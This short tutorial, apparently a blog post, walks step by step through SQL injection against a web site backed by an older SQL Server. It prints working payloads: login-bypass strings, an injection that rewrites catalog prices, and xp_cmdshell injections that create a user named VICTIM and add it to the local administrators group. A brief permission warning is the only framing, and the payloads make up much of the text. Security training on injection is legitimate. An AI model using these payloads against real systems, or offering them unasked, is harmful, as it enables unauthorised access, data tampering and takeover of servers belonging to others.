Use the following code examples to inject:

' or '1'='1

 

 

The following steps show how a hacker can bypass Web Application Security by performing an SQL injection attack into a web site that connects to an SQL Server.

This example is for an older SQL Server product as Microsoft has disabled some of the functionality in the newer versions that cause the vulnerabilities used in this exercise.

1. Navigate to a site that you believe has an SQL database on the backend BUT make sure you have permission to execute the attack.

WARNING: If you don’t have written permission to perform this attack, then turn off your computer and go for a walk. You’ve been warned.

2. To bypass a logon screen using SQLi, type something in the Name field box, and then type

pass' or 1=1 --

in the box and review the server’s response. You may be able to login on older systems doing that.

3. Once a hacker can bypass logon, then you can try to perform malicious acts against your data, such as changing the price in a catalog.

pass' or 1=1;update titles set price=.5 --

4. You can call operating system commands through the web application using an SQL injection attack. In this example, you will create a user account named VICTIM and place that user in the administrators group using SQL injection:

pass';exec master..xp_cmdshell "net user VICTIM password /add" -- 

pass';exec master..xp_cmdshell "net localgroup administrators VICTIM /add" --

Leave a Reply

Your email address will not be published.